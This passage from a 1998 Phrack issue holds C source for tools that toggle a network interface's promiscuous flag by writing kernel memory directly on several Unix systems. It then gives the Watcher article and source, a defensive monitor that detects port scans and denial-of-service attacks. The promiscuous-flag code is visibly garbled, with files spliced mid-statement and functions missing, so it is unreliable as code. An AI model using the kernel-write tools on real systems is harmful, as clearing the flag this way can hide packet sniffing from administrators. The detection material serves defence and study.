perror("kread"); break; } printf("%d: %s%d, flags=0x%x ", ifn.if_index, ifname, ifn.if_unit, (unsigned short)ifn.if_flags); /* this is from ifconfig sources */(kd, (u_long)ifp, &ifn, sizeof(ifn)) == -1) perror("kwrite"); } break; default: if ((ifn.if_flags & IFF_PROMISC) == IFF_PROMISC) printf("\tIFF_PROMISC set already\n"); else { printf("\t%s%d: setting IFF_PROMISC\n", ifname, unit); ifn.if_flags |= IFF_PROMISC; if (kwrite(kd, (u_long)ifp, &ifn, sizeof(ifn)) == -1) perror("kwrite"); } break; } } } } <--> <++> EX/promisc/hpux-p.c /* * promiscuous flag changer v0.1, apk * HP-UX version, on HP-UX 9.x compile with -DHPUX9 * * usage: promisc [interface 0|1] * * note: look at README for notes */ /* #define HPUX9 on HP-UX 9.x */ #include <sys/types.h> #include <sys/socket.h> #include <net/if.h> #include <nlist.h> #include <stdio.h> #include <stdlib.h> #include <errno.h> #include <string.h> #include <fcntl.h> #include <unistd.h> #ifndef HPUX9 # define PATH_VMUNIX "/stand/vmunix" #else # define PATH_VMUNIX "/hp-ux" #endif " struct nlist nl[] = { { "ifnet" }, #define N_IFNET 0 { "" } }; int kread(fd, addr, buf, len) int fd, len; off_t addr; void *buf; { int c; if (lseek(fd, addr, SEEK_SET) == -1) return -1; if ((c = read(fd, buf, len)) != len) return -1; return c; } int kwrite(fd, addr, buf, len) int fd, len; off_t addr; void *buf; { int c; if (lseek(fd, addr, SEEK_SET) == -1) (nlist(PATH_VMUNIX, nl) == -1) {/irix-p.c /* * promiscuous flag changer v0.1, apk * Irix version, on Irix 6.x compile with -lelf, on 5.x with -lmld * * usage: promisc [interface 0|1] * * note: look at README for notes on irix64 compile with -DI64 -64 */ /* #define I64 for Irix64*/ #include <sys/types.h> #include <sys/socket.h> #include <net/if.h> #include <nlist.h> #include <stdio.h> #include <stdlib.h> #include <errno.h> #include <string.h> #include <fcntl.h> #include <unistd.h> #define PATH_VMUNIX "/unix" " #ifdef I64 struct nlist64 nl[] = { #else struct nlist nl[] = { #endif { "ifnet" }, #define 
N_IFNET 0 { "" } }; int kread(int fd, off_t addr, void *buf, int len) { int c; #ifdef I64 if (lseek64(fd, (off_t)addr, SEEK_SET) == -1) #else if (lseek(fd, (off_t)addr, SEEK_SET) == -1) #endif return -1; if ((c = read(fd, buf, len)) != len) return -1; return c; } int kwrite(int fd, off_t addr, void *buf, int len) { int c; #ifdef I64 if (lseek64(fd, (off_t)addr, SEEK_SET) == -1) #else if (lseek(fd, (off_t)addr, SEEK_SET) == -1) #endifdef I64 if (nlist64(PATH_VMUNIX, nl) == -1) { #else if (nlist(PATH_VMUNIX, nl) == -1) { #endif/linux-p.c /* * promiscuous flag changer v0.1, apk * Linux version * * usage: promisc [interface 0|1] * * note: look at README for notes */ #include <sys/types.h> #include <sys/socket.h> #include <net/if.h> #define __KERNEL__ #include <linux/netdevice.h> #undef __KERNEL__ #include <stdio.h> #include <stdlib.h> #include <errno.h> #include <string.h> #include <fcntl.h> #include <unistd.h> #define HEAD_NAME "dev_base" #define PATH_KSYMS "/proc/ksyms" #define PATH_KMEM "/dev/mem" #define IFFBITS \ "\1UP\2BROADCAST\3DEBUG\4LOOPBACK\5POINTOPOINT\6NOTRAILERS\7RUNNING" \ "\10NOARP\11PROMISC\12ALLMULTI\13MASTER\14SLAVE\15MULTICAST" int kread(int fd, u_long addr, void *buf, int len) { int c; if (lseek(fd, (off_t)addr, SEEK_SET) == -1) return -1; if ((c = read(fd, buf, len)) != len) return -1; return c; } int kwrite(int fd, u_long addr, void *buf, int len) { int c; if (lseek(fd, (off_t)addr, SEEK_SET) == -1) return -1; if ((c = write(fd, buf, len)) != len) return -1; return c; } void usage(char *s) { printf("usage: %s [interface 0|1]\n", s); exit(1); } main(int argc, char *argv[]) { struct device devn, *devp; char ifname[IFNAMSIZ]; int fd, unit, promisc, i, any; char *interface, *cp; FILE *fp; char line[256], symname[256]; switch (argc) { case 1: promisc = -1; interface = NULL; break; case 3: interface = argv[1]; unit = 0; if ((cp = strchr(interface, ':')) != NULL) { *cp++ = 0; unit = strtol(cp, NULL, 10); } promisc = atoi(argv[2]); break; default: 
usage(argv[0]); } if ((fp = fopen(PATH_KSYMS, "r")) == NULL) { perror(PATH_KSYMS); exit(1); } devp = NULL; while (fgets(line, sizeof(line), fp) != NULL && sscanf(line, "%x %s", &i, symname) == 2) if (strcmp(symname, HEAD_NAME) == 0) { devp = (struct device *)i; break; } fclose(fp); if (devp == NULL) { printf("Cannot find symbol: %s\n", HEAD_NAME); exit(1); } if ((fd = open(PATH_KMEM, O_RDWR)) == -1) { perror(PATH_KMEM); exit(1); } if (kread(fd, (u_long)devp, &devp, sizeof(devp)) == -1) { perror("kread"); exit(1); } for (; devp; devp = devn.next) { if (kread(fd, (u_long)devp, &devn, sizeof(devn)) == -1) { perror("kread"); break; } if (kread(fd, (u_long)devn.name, ifname, sizeof(ifname)) == -1) { perror("kread"); break; } printf("%s: flags=0x%x ", ifname, devn.flags); cp = IFFBITS; any = 0; putchar('<'); while ((i = *cp++) != 0) { if (devn.flags & (1 << (i-1))) { if (any) putchar(','); any = 1; for (; *cp > 32; ) putchar(*cp++); } else for (; *cp > 32; cp++) ; } putchar('>'); putchar('\n'); /* This sux */ /* if (interface && strcmp(interface, ifname) == 0 && unit == ifn.if_unit) {*/ if (interface && strcmp(interface, ifname) == 0) { switch (promisc) { case -1: break; case 0: if ((devn.flags & IFF_PROMISC) == 0) printf("\tIFF_PROMISC not set\n"); else { printf("\t%s: clearing IFF_PROMISC\n", ifname); devn.flags &= ~IFF_PROMISC; if (kwrite(fd, (u_long)devp, &devn, sizeof(devn)) == -1) break; } break; default: if ((devn.flags & IFF_PROMISC) == IFF_PROMISC) printf("\tIFF_PROMISC set already\n"); else { printf("\t%s: setting IFF_PROMISC\n", ifname); devn.flags |= IFF_PROMISC; if (kwrite(fd, (u_long)devp, &devn, sizeof(devn)) == -1) break; } } } } } <--> <++> EX/promisc/socket-p.c /* * This is really dumb program. * Works on Linux, FreeBSD and Irix. * Check README for comments. 
*/ #include <sys/types.h> #include <sys/socket.h> #include <sys/time.h> #include <sys/ioctl.h> #include <net/if.h> #include <unistd.h> #include <stdio.h> #include <stdlib.h> #include <string.h> int main(int argc, char *argv[]) { int sd; struct ifreq ifr; char *interface; int promisc; if (argc != 3) { printf("usage: %s interface 0|1\n", argv[0]); exit(1); } interface = argv[1]; promisc = atoi(argv[2]); if ((sd = socket(AF_INET, SOCK_DGRAM, 0)) == -1) { perror("socket"); exit(1); } strncpy(ifr.ifr_name, interface, IFNAMSIZ); if (ioctl(sd, SIOCGIFFLAGS, &ifr) == -1) { perror("SIOCGIFFLAGS"); exit(1); } printf("flags = 0x%x\n", (u_short)ifr.ifr_flags); if (promisc) ifr.ifr_flags |= IFF_PROMISC; else ifr.ifr_flags &= ~IFF_PROMISC; if (ioctl(sd, SIOCSIFFLAGS, &ifr) == -1) { perror("SIOCSIFFLAGS"); exit(1); } close(sd); } <--> <++> EX/promisc/solaris-p.c /* * promiscuous flag changer v0.1, apk * Solaris version, compile with -lkvm -lelf * * usage: promisc [interface 0|1] * (interface has "interface[:<alias number>]" format, e.g. le0:1 or le0) * * note: look at README for notes because DLPI promiscuous request doesn't * set IFF_PROMISC this version is kinda useless. */ #include <sys/types.h> #include <sys/time.h> #include <sys/stream.h> #include <sys/socket.h> #include <net/if.h> #define _KERNEL #include <inet/common.h> #include <inet/led.h> #include <inet/ip.h> #undef _KERNEL INTELLIGENT\14MULTICAST\15MULTI_BCAST" \ "\16UNNUMBERED\17PRIVATE" struct nlist nl[] = { { "ill_g_head" }, #define N_ILL_G_HEAD[]) { ill_t illn, *illp; ipif_t ipifn, *ipifp; char ifname[IFNAMSIZ]; /* XXX IFNAMSIZ? 
*/ int unit, promisc, i, any; char *interface, *cp; kvm_t *kd; switch (argc) { case 1: promisc = -1; interface = NULL; break; case 3: interface = argv[1]; unit = 0; if ((cp = strchr(interface, ':')) != NULL) { *cp++ = 0; unit = strtol(cp, NULL, 10); }_ILL_G_HEAD].n_type == 0) { printf("Cannot find symbol: %s\n", nl[N_ILL_G_HEAD].n_name); exit(1); } if (kread(kd, nl[N_ILL_G_HEAD].n_value, &illp, sizeof(illp)) == -1) { perror("kread"); exit(1); } for (; illp; illp = illn.ill_next) { if (kread(kd, (u_long)illp, &illn, sizeof(illn)) == -1) { perror("kread"); break; } if (kread(kd, (u_long)illn.ill_name, ifname, sizeof(ifname)) == -1) { perror("kread"); break; } ipifp = illn.ill_ipif; /* on Solaris you can set different flags for every alias, so we do */ for (; ipifp; ipifp = ipifn.ipif_next) { if (kread(kd, (u_long)ipifp, &ipifn, sizeof(ipifn)) == -1) { perror("kread"); break; } printf("%s:%d, flags=0x%x ", ifname, ipifn.ipif_id, ipifn.ipif_flags); cp = IFFBITS; any = 0; putchar('<'); while ((i = *cp++) != 0) { if (ipifn.ipif_flags & (1 << (i-1))) { if (any) putchar(','); any = 1; for (; *cp > 32; ) putchar(*cp++); } else for (; *cp > 32; cp++) ; } putchar('>'); putchar('\n'); if (interface && strcmp(interface, ifname) == 0 && unit == ipifn.ipif_id){ switch (promisc) { case -1: break; case 0: if ((ipifn.ipif_flags & IFF_PROMISC) == 0) printf("\tIFF_PROMISC not set\n"); else { printf("\t%s:%d: clearing IFF_PROMISC\n", ifname, unit); ipifn.ipif_flags &= ~IFF_PROMISC; if (kwrite(kd, (u_long)ipifp, &ipifn, sizeof(ipifn)) == -1) perror("kwrite"); } break; default: if ((ipifn.ipif_flags & IFF_PROMISC) == IFF_PROMISC) printf("\tIFF_PROMISC set already\n"); else { printf("\t%s:%d: setting IFF_PROMISC\n", ifname, unit); ipifn.ipif_flags |= IFF_PROMISC; if (kwrite(kd, (u_long)ipifp, &ipifn, sizeof(ipifn)) == -1) perror("kwrite"); } break; } } } } } <--> ----[ EOF -------------------------------------------------------------------------------- ---[ Phrack Magazine Volume 8, Issue 
53 July 8, 1998, article 11 of 15 -------------------------[ Watcher --------[ hyperion <hyperion@hacklab.com> ----[ INTRODUCTION Do you know if your system has been hacked? If you found those funny user accounts or that Trojaned program, it's too late. You're owned. Chances are that your systems were scanned for holes before they were cracked. If you had just seen them coming you wouldn't be reloading that OS right now. Programs like TCP Wrappers do some good, but they don't see the stealth scans or DOS attacks. You could buy a nice commercial network intrusion detector, but your wallet screams in agony. What you need is a low-cost (as in free), fast, somewhat paranoid network monitor that watches all packets and uses few resources. Watcher provides this. ----[ IMPLEMENTATION Watcher examines all packets on the network interface and assumes they all are potentially hostile. Watcher examines every packet within a 10 second window, and, at the end of each window, it will record any malicious activity it sees using syslog. Watcher currently detects the following attacks: - All TCP scans - All UDP scans - Synflood attacks - Teardrop attacks - Land attacks - Smurf attacks - Ping of death attacks All parameters and thresholds are configurable through command line options. You can also configure watcher to just look for scans or just look for DOS attacks. Watcher assumes any TCP packet other than a RST (which elicits no response) may be used to scan for services. If packets of any type are received for more than 7 different ports within the window, an event is logged. The same criteria are used for UDP scans. If watcher sees more than 8 SYN packets to the same port with no ACK's or FIN's associated with the SYN's, a synflood event is logged. If a fragmented UDP packet with an IP id of 242 is seen, it is assumed to be a teardrop attack since the published code uses an id of 242. This is somewhat lame since anyone could change the attacking code to use other id's.
The code should track all fragmented IP's and check for overlapping offsets. I may do this in a future version. Any TCP SYN packet whose source and destination addresses and ports are the same is identified as a land attack. If more than 5 ICMP ECHO REPLIES are seen within the window, Watcher assumes it may be a Smurf attack. Note that this is not a certainty, since someone you're watching may just be pinging the hell out of someone. Watcher also assumes that any fragmented ICMP packet is bad, bad, bad. This catches attacks such as the ping of death. Watcher has three modes of monitoring. In the default mode, it just watches for attacks against its own host. The second monitoring mode is to watch all hosts on its class C subnet. In the third mode, it watches all hosts whose packets it sees. Watching multiple hosts is useful if you put Watcher on your border to external networks, or to have hosts watch out for each other in case one gets cracked before you can react. Even if log files are destroyed, the other host has a record. It must be noted that since Watcher treats every packet as potentially hostile, it sometimes can report false positives. There are some checks in the code to minimize this by increasing its tolerance for certain activity. Unfortunately this also increases the rate at which scans can be done before Watcher notices. The usual false positives are TCP scans and synfloods, mostly resulting from WWW activity. Some web pages have many URL's to GIF files and other pretty stuff. Each of these may cause the client to open a separate TCP connection to download. Watcher sees these and treats them as a TCP scan of the client. To minimize this, watcher will only log TCP scans if more than 40 are received in the window AND the source port of the scan was 80. This of course can be configured higher or lower as desired. As for synfloods, we will use the same WWW example above.
If the client opens a lot of connections to the server right before the 10 second window expires and Watcher does not see the ACK's or FIN's for those SYN packets, Watcher will think the client is synflooding port 80 on the server. This only happens if watcher is watching the server, or if you are watching everyone. You may also get occasional false UDP scans if the system being watched makes lots of DNS queries within the window. The output for Watcher is pretty simple. Every 10 seconds, any detected attacks are logged to syslog. The source and target IP's are logged along with the type of attack. Where appropriate, other information, such as the number of packets or the port involved, is logged. If the attack is normally associated with false IP addresses, the MAC address is also logged. If the attack is external, the MAC will be for the local router that handled the packet. If it was from your LAN, you'll have the source machine and you can thank the sender in an appropriate manner. ----[ PROGRAM EXECUTION Watcher was written to run on Linux systems. Watcher has a variety of options, most of them self-explanatory. To execute watcher, simply run it in the background, usually from the system startup script. The options are: Usage: watcher [options] -d device Use 'device' as the network interface device The first non-loopback interface is the default -f flood Assume a synflood attack occurred if more than 'flood' uncompleted connections are received -h A little help here -i icmplimit Assume we may be part of a smurf attack if more than icmplimit ICMP ECHO REPLIES are seen -m level Monitor more than just our own host. A level of 'subnet' watches all addresses in our subnet and 'all' watches all addresses -p portlimit Logs a portscan alert if packets are received for more than portlimit ports in the timeout period. -r reporttype If reporttype is dos, only Denial Of Service attacks are reported. If reporttype is scan then only scanners are reported.
Everything is reported by default. -t timeout Count packets and print potential attacks every timeout seconds -w webcount Assume we are being portscanned if more than webcount packets are received from port 80 Hopefully, watcher will keep your systems a little better protected. But remember that good security is multiple layers, and no single defense tool will save you by itself. If you forget this, you'll be reloading that OS one day. ----[ THE CODE <++> EX/Watcher.c /********************************************************************* Program: watcher A network level monitoring tool to detect incoming packets indicative of potential attacks. This software detects low level packet scanners and several DOS attacks. Its primary use is to detect low level packet scans, since these are usually done first to identify active systems and services to mount further attacks. The package assumes every incoming packet is potentially hostile. Some checks are done to minimize false positives, but on occasion a site may be falsely identified as having performed a packet scan or SYNFLOOD attack. This usually occurs if a large number of connections are done in a brief time right before the reporting timeout period (i.e. when browsing a WWW site with lots of little GIF's, each requiring a connection to download). You can also get false positives if you scan another site, since the targets responses will be viewed as a potential scan of your system. By default, alerts are printed to SYSLOG every 10 seconds. 
***********************************************************************/ #include <stdio.h> #include <sys/types.h> #include <sys/time.h> #include <sys/socket.h> #include <sys/file.h> #include <sys/time.h> #include <netinet/in.h> #include <netdb.h> #include <string.h> #include <errno.h> #include <ctype.h> #include <malloc.h> #include <netinet/tcp.h> #include <netinet/in_systm.h> #include <net/if_arp.h> #include <net/if.h> #include <netinet/udp.h> #include <netinet/ip.h> #include <netinet/ip_icmp.h> #include <linux/if_ether.h> #include <syslog.h> #define PKTLEN 96 /* Should be enough for what we want */ #ifndef IP_MF #define IP_MF 0x2000 #endif /***** WATCH LEVELS ******/ #define MYSELFONLY 1 #define MYSUBNET 2 #define HUMANITARIAN 3 /***** REPORT LEVELS *****/ #define REPORTALL 1 #define REPORTDOS 2 #define REPORTSCAN 3 struct floodinfo { u_short sport; struct floodinfo *next; }; struct addrlist { u_long saddr; int cnt; int wwwcnt; struct addrlist *next; }; struct atk { u_long saddr; u_char eaddr[ETH_ALEN]; time_t atktime; }; struct pktin { u_long saddr; u_short sport; u_short dport; time_t timein; u_char eaddr[ETH_ALEN]; struct floodinfo *fi; struct pktin *next; }; struct scaninfo { u_long addr; struct atk teardrop; struct atk land; struct atk icmpfrag; struct pktin *tcpin; struct pktin *udpin; struct scaninfo *next; u_long icmpcnt; } ; struct scaninfo *Gsilist = NULL, *Gsi; u_long Gmaddr; time_t Gtimer = 10, Gtimein; int Gportlimit = 7; int Gsynflood = 8; int Gwebcount = 40; int Gicmplimit = 5; int Gwatchlevel = MYSELFONLY; int Greportlevel = REPORTALL; char *Gprogramname, *Gdevice = "eth0"; /******** IP packet info ********/ u_long Gsaddr, Gdaddr; int Giplen, Gisfrag, Gid; /****** Externals *************/ extern int errno; extern char *optarg; extern int optind, opterr; void do_tcp(), do_udp(), do_icmp(), print_info(), process_packet(); void addtcp(), addudp(), clear_pktin(), buildnet(); void doargs(), usage(), addfloodinfo(), rmfloodinfo(); struct scaninfo 
*doicare(), *addtarget(); char *anetaddr(), *ether_ntoa(); u_char *readdevice(); main(argc, argv) int argc; char *argv[]; { int pktlen = 0, i, netfd; u_char *pkt; char hostname[32]; struct hostent *hp; time_t t; doargs(argc, argv); openlog("WATCHER", 0, LOG_DAEMON); if(gethostname(hostname, sizeof(hostname)) < 0) { perror("gethostname"); exit(-1); } if((hp = gethostbyname(hostname)) == NULL) { fprintf(stderr, "Cannot find own address\n"); exit(-1); } memcpy((char *)&Gmaddr, hp->h_addr, hp->h_length); buildnet(); if((netfd = initdevice(O_RDWR, 0)) < 0) exit(-1); /* Now read packets forever and process them. */ t = time((time_t *)0); while(pkt = readdevice(netfd, &pktlen)) { process_packet(pkt, pktlen); if(time((time_t *)0) - t > Gtimer) { /* Times up. Print what we found and clean out old stuff. */ for(Gsi = Gsilist, i = 0; Gsi; Gsi = Gsi->next, i++) { clear_pktin(Gsi); print_info(); Gsi->icmpcnt = 0; } t = time((time_t *)0); } } } /********************************************************************** Function: doargs Purpose: sets values from environment or command line arguments. 
**********************************************************************/ void doargs(argc, argv) int argc; char **argv; { char c; Gprogramname = argv[0]; while((c = getopt(argc,argv,"d:f:hi:m:p:r:t:w:")) != EOF) { switch(c) { case 'd': Gdevice = optarg; break; case 'f': Gsynflood = atoi(optarg); break; case 'h': usage(); exit(0); case 'i': Gicmplimit = atoi(optarg); break; case 'm': if(strcmp(optarg, "all") == 0) Gwatchlevel = HUMANITARIAN; else if(strcmp(optarg, "subnet") == 0) Gwatchlevel = MYSUBNET; else { usage(); exit(-1); } break; case 'p': Gportlimit = atoi(optarg); break; case 'r': if(strcmp(optarg, "dos") == 0) Greportlevel = REPORTDOS; else if(strcmp(optarg, "scan") == 0) Greportlevel = REPORTSCAN; else { exit(-1); } break; case 't': Gtimer = atoi(optarg); break; case 'w': Gwebcount = atoi(optarg); break; default: usage(); exit(-1); } } } /********************************************************************** Function: usage Purpose: Display the usage of the program **********************************************************************/ void usage() { printf("Usage: %s [options]\n", Gprogramname); printf(" -d device Use 'device' as the network interface device\n"); printf(" The first non-loopback interface is the default\n"); printf(" -f flood Assume a synflood attack occurred if more than\n"); printf(" 'flood' uncompleted connections are received\n"); printf(" -h A little help here\n"); printf(" -i icmplimit Assume we may be part of a smurf attack if more\n"); printf(" than icmplimit ICMP ECHO REPLIES are seen\n"); printf(" -m level Monitor more than just our own host.\n"); printf(" A level of 'subnet' watches all addresses in our\n"); printf(" subnet and 'all' watches all addresses\n"); printf(" -p portlimit Logs a portscan alert if packets are received for\n"); printf(" more than portlimit ports in the timeout period.\n"); printf(" -r reporttype If reporttype is dos, only Denial Of Service\n"); printf(" attacks are reported. 
If reporttype is scan\n"); printf(" then only scanners are reported. Everything is\n"); printf(" reported by default.\n"); printf(" -t timeout Count packets and print potential attacks every\n"); printf(" timeout seconds\n"); printf(" -w webcount Assume we are being portscanned if more than\n"); printf(" webcount packets are received from port 80\n"); } /********************************************************************** Function: buildnet Purpose: Setup for monitoring of our host or entire subnet. **********************************************************************/ void buildnet() { u_long addr; u_char *p; int i; if(Gwatchlevel == MYSELFONLY) /* Just care about me */ { (void) addtarget(Gmaddr); } else if(Gwatchlevel == MYSUBNET) /* Friends and neighbors */ { addr = htonl(Gmaddr); addr = addr & 0xffffff00; for(i = 0; i < 256; i++) (void) addtarget(ntohl(addr + i)); } } /********************************************************************** Function: doicare Purpose: See if we monitor this address **********************************************************************/ struct scaninfo *doicare(addr) u_long addr; { struct scaninfo *si; int i; for(si = Gsilist; si; si = si->next) { if(si->addr == addr) return(si); } if(Gwatchlevel == HUMANITARIAN) /* Add a new address, we always care */ { si = addtarget(addr); return(si); } return(NULL); } /********************************************************************** Function: addtarget Purpose: Adds a new IP address to the list of hosts to watch. 
**********************************************************************/ struct scaninfo *addtarget(addr) u_long addr; { struct scaninfo *si; if((si = (struct scaninfo *)malloc(sizeof(struct scaninfo))) == NULL) { perror("malloc scaninfo"); exit(-1); } memset(si, 0, sizeof(struct scaninfo)); si->addr = addr; si->next = Gsilist; Gsilist = si; return(si); } /********************************************************************** Function: process_packet Purpose: Process raw packet and figure out what we need to to with it. Pulls the packet apart and stores key data in global areas for reference by other functions. **********************************************************************/ void process_packet(pkt, pktlen) u_char *pkt; int pktlen; { struct ethhdr *ep; struct iphdr *ip; static struct align { struct iphdr ip; char buf[PKTLEN]; } a1; u_short off; Gtimein = time((time_t *)0); ep = (struct ethhdr *) pkt; if(ntohs(ep->h_proto) != ETH_P_IP) return; pkt += sizeof(struct ethhdr); pktlen -= sizeof(struct ethhdr); memcpy(&a1, pkt, pktlen); ip = &a1.ip; Gsaddr = ip->saddr; Gdaddr = ip->daddr; if((Gsi = doicare(Gdaddr)) == NULL) return; off = ntohs(ip->frag_off); Gisfrag = (off & IP_MF); /* Set if packet is fragmented */ Giplen = ntohs(ip->tot_len); Gid = ntohs(ip->id); pkt = (u_char *)ip + (ip->ihl << 2); Giplen -= (ip->ihl << 2); switch(ip->protocol) { case IPPROTO_TCP: do_tcp(ep, pkt); break; case IPPROTO_UDP: do_udp(ep, pkt); break; case IPPROTO_ICMP: do_icmp(ep, pkt); break; default: break; } } /********************************************************************** Function: do_tcp Purpose: Process this TCP packet if it is important. **********************************************************************/ void do_tcp(ep, pkt) struct ethhdr *ep; u_char *pkt; { struct tcphdr *thdr; u_short sport, dport; thdr = (struct tcphdr *) pkt; if(thdr->th_flags & TH_RST) /* RST generates no response */ return; /* Therefore can't be used to scan. 
*/
	sport = ntohs(thdr->th_sport);
	dport = ntohs(thdr->th_dport);
	if(thdr->th_flags & TH_SYN)
	{
		if(Gsaddr == Gdaddr && sport == dport)	/* land signature */
		{
			Gsi->land.atktime = Gtimein;
			Gsi->land.saddr = Gsaddr;
			memcpy(Gsi->land.eaddr, ep->h_source, ETH_ALEN);
		}
	}
	addtcp(sport, dport, thdr->th_flags, ep->h_source);
}

/**********************************************************************
Function: addtcp
Purpose: Add this TCP packet to our list.
**********************************************************************/
void addtcp(sport, dport, flags, eaddr)
u_short sport;
u_short dport;
u_char flags;
u_char *eaddr;
{
	struct pktin *pi, *last = NULL, *tpi;

	/* See if this packet relates to other packets already received. */
	for(pi = Gsi->tcpin; pi; last = pi, pi = pi->next)
	{
		if(pi->saddr == Gsaddr && pi->dport == dport)
		{
			if(flags == TH_SYN)
				addfloodinfo(pi, sport);
			else if((flags & TH_FIN) || (flags & TH_ACK))
				rmfloodinfo(pi, sport);
			pi->timein = Gtimein;
			return;
		}
	}

	/* First packet from this source for this port: record a new entry. */
	if((tpi = (struct pktin *)malloc(sizeof(struct pktin))) == NULL)
	{
		perror("malloc pktin");
		exit(-1);
	}
	memset(tpi, 0, sizeof(struct pktin));
	tpi->saddr = Gsaddr;
	tpi->sport = sport;
	tpi->dport = dport;
	tpi->timein = Gtimein;
	memcpy(tpi->eaddr, eaddr, ETH_ALEN);
	if(flags == TH_SYN)
		addfloodinfo(tpi, sport);
	if(Gsi->tcpin)
		last->next = tpi;
	else
		Gsi->tcpin = tpi;
}

/**********************************************************************
Function: addfloodinfo
Purpose: Add floodinfo information
**********************************************************************/
void addfloodinfo(pi, sport)
struct pktin *pi;
u_short sport;
{
	struct floodinfo *fi;

	fi = (struct floodinfo *)malloc(sizeof(struct floodinfo));
	if(fi == NULL)
	{
		perror("Malloc of floodinfo");
		exit(-1);
	}
	memset(fi, 0, sizeof(struct floodinfo));
	fi->sport = sport;
	fi->next = pi->fi;
	pi->fi = fi;
}

/**********************************************************************
Function: rmfloodinfo
Purpose: Removes floodinfo information
**********************************************************************/
void rmfloodinfo(pi, sport)
struct pktin *pi;
u_short sport;
{
	struct floodinfo *fi, *prev = NULL;

	for(fi = pi->fi; fi; fi = fi->next)
	{
		if(fi->sport == sport)
			break;
		prev = fi;
	}
	if(fi == NULL)
		return;
	if(prev == NULL)	/* First element */
		pi->fi = fi->next;
	else
		prev->next = fi->next;
	free(fi);
}

/**********************************************************************
Function: do_udp
Purpose: Process this udp packet. Currently teardrop and all its
derivatives put 242 in the IP id field. This could obviously be
changed. The truly paranoid might want to flag all fragmented UDP
packets. The truly adventurous might enhance the code to track
fragments and check them for overlapping boundaries.
**********************************************************************/
void do_udp(ep, pkt)
struct ethhdr *ep;
u_char *pkt;
{
	struct udphdr *uhdr;
	u_short sport, dport;

	uhdr = (struct udphdr *) pkt;
	if(Gid == 242 && Gisfrag)	/* probable teardrop */
	{
		Gsi->teardrop.saddr = Gsaddr;
		memcpy(Gsi->teardrop.eaddr, ep->h_source, ETH_ALEN);
		Gsi->teardrop.atktime = Gtimein;
	}
	sport = ntohs(uhdr->source);
	dport = ntohs(uhdr->dest);
	addudp(sport, dport, ep->h_source);
}

/**********************************************************************
Function: addudp
Purpose: Add this udp packet to our list.
**********************************************************************/
void addudp(sport, dport, eaddr)
u_short sport;
u_short dport;
u_char *eaddr;
{
	struct pktin *pi, *last = NULL, *tpi;

	for(pi = Gsi->udpin; pi; last = pi, pi = pi->next)
	{
		if(pi->saddr == Gsaddr && pi->dport == dport)
		{
			pi->timein = Gtimein;
			return;
		}
	}

	/* New source/port pair: record it. */
	if((tpi = (struct pktin *)malloc(sizeof(struct pktin))) == NULL)
	{
		perror("malloc pktin");
		exit(-1);
	}
	memset(tpi, 0, sizeof(struct pktin));
	tpi->saddr = Gsaddr;
	tpi->sport = sport;
	tpi->dport = dport;
	tpi->timein = Gtimein;
	memcpy(tpi->eaddr, eaddr, ETH_ALEN);
	if(Gsi->udpin)
		last->next = tpi;
	else
		Gsi->udpin = tpi;
}

/**********************************************************************
Function: do_icmp
Purpose: Process an ICMP packet. We assume there is no valid reason
to receive a fragmented ICMP packet.
**********************************************************************/
void do_icmp(ep, pkt)
struct ethhdr *ep;
u_char *pkt;
{
	struct icmphdr *icmp;

	icmp = (struct icmphdr *) pkt;
	if(Gisfrag)	/* probable ICMP attack (i.e.
Ping of Death) */ { Gsi->icmpfrag.saddr = Gsaddr; memcpy(Gsi->icmpfrag.eaddr, ep->h_source, ETH_ALEN); Gsi->icmpfrag.atktime = Gtimein; } if(icmp->type == ICMP_ECHOREPLY) Gsi->icmpcnt++; return; } /********************************************************************** Function: clear_pkt Purpose: Delete and free space for any old packets. **********************************************************************/ void clear_pktin(si) struct scaninfo *si; { struct pktin *pi; struct floodinfo *fi, *tfi; time_t t, t2; t = time((time_t *)0); while(si->tcpin) { t2 = t - si->tcpin->timein; if(t2 > Gtimer) { pi = si->tcpin; fi = pi->fi; while(fi) { tfi = fi; fi = fi->next; free(tfi); } si->tcpin = pi->next; free(pi); } else break; } while(si->udpin) { t2 = t - si->udpin->timein; if(t2 > Gtimer) { pi = si->udpin; si->udpin = pi->next; free(pi); } else break; } } /********************************************************************** Function: print_info Purpose: Print out any alerts. **********************************************************************/ void print_info() { struct pktin *pi; struct addrlist *tcplist = NULL, *udplist = NULL, *al; struct floodinfo *fi; char buf[1024], *eaddr, abuf[32]; int i; strcpy(abuf, anetaddr(Gsi->addr)); if(Greportlevel == REPORTALL || Greportlevel == REPORTDOS) { if(Gsi->teardrop.atktime) { eaddr = ether_ntoa(Gsi->teardrop.eaddr); sprintf(buf, "Possible teardrop attack from %s (%s) against %s", anetaddr(Gsi->teardrop), eaddr, abuf); syslog(LOG_ALERT, buf); memset(&Gsi->teardrop, 0, sizeof(struct atk)); } if(Gsi->land.atktime) { eaddr = ether_ntoa(Gsi->land.eaddr); sprintf(buf, "Possible land attack from (%s) against %s", eaddr, abuf); syslog(LOG_ALERT, buf); memset(&Gsi->land, 0, sizeof(struct atk)); } if(Gsi->icmpfrag.atktime) { eaddr = ether_ntoa(Gsi->icmpfrag.eaddr); sprintf(buf, "ICMP fragment detected from %s (%s) against %s", anetaddr(Gsi->icmpfrag), eaddr, abuf); syslog(LOG_ALERT, buf); memset(&Gsi->icmpfrag, 0, sizeof(struct 
atk)); } if(Gsi->icmpcnt > Gicmplimit) { sprintf(buf, "ICMP ECHO threshold exceeded, smurfs up. I saw %d packets\n", Gsi->icmpcnt); syslog(LOG_ALERT, buf); Gsi->icmpcnt = 0; } } for(pi = Gsi->tcpin; pi; pi = pi->next) { i = 0; for(fi = pi->fi; fi; fi = fi->next) i++; if(Greportlevel == REPORTALL || Greportlevel == REPORTDOS) { if(i > Gsynflood) { eaddr = ether_ntoa(pi->eaddr); sprintf(buf, "Possible SYNFLOOD from %s (%s), against %s. I saw %d packets\n", anetaddr(pi->saddr), eaddr, abuf, i); syslog(LOG_ALERT, buf); } } for(al = tcplist; al; al = al->next) { if(pi->saddr == al->saddr) { al->cnt++; if(pi->sport == 80) al->wwwcnt++; break; } } if(al == NULL) /* new address */ { al = (struct addrlist *)malloc(sizeof(struct addrlist)); if(al == NULL) { perror("Malloc address list"); exit(-1); } memset(al, 0, sizeof(struct addrlist)); al->saddr = pi->saddr; al->cnt = 1; if(pi->sport == 80) al->wwwcnt = 1; al->next = tcplist; tcplist = al; } } if(Greportlevel == REPORTALL || Greportlevel == REPORTSCAN) { for(al = tcplist; al; al = al->next) { if((al->cnt - al->wwwcnt) > Gportlimit || al->wwwcnt > Gwebcount) { sprintf(buf, "Possible TCP port scan from %s (%d ports) against %s\n", anetaddr(al->saddr), al->cnt, abuf); 